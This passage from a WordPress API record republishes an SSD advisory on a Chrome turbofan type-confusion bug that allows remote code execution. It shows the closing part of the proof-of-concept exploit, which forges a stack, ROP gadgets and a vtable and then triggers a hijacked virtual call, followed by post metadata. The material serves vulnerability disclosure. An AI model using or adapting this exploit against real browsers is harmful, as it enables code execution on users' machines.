class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">writePtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">el_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x10n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fake_stack<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ RSP<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-251\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">writePtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">el_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x50n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pop_gadgets<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1n<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ RIP = ret<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-252\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">writePtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">el_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x58n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0n<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-253\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">writePtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">el_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x60n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0n<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-254\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">writePtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">el_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x68n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0n<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-255\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">writePtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">el_addr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fake_vtab<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-256\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-257\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ Trigger virtual call<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-258\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">div<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">dispatchEvent<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Event<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;click&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-259\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-260\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ We are done here, repair the corrupted array buffers<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-261\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">addrof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">driver_buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-262\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">writePtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">32n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">original_driver_buf_ptr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-263\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">writePtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">memview_buf_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">32n<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">original_memview_buf_ptr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-264\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-265\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-266\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Press OK to pwn&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-267\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">pwn<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-268\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-ta\">&lt;\/script&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-269\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">head<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-270\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-271\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-272\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0309 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3783\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Mon, 29 Oct 2018 09:21:47 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory discusses a vulnerability found in turbofan, the JIT compiler. We can trigger the JavaScript code in a way that leads to type confusion that can be exploited in order to execute code remotely on Google Chrome Versions 69.0 and before. Vendor Response Vendor has fixed the issue in Google Chrome &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3783\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Chrome Type Confusion in JSCreateObject Operation to RCE<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11682,10757,19988],"class_list":["post-13713","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-code-execution","tag-securiteam-secure-disclosure","tag-type-confusion"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13713","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=13713"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13713\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=13713"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=13713"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=13713"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}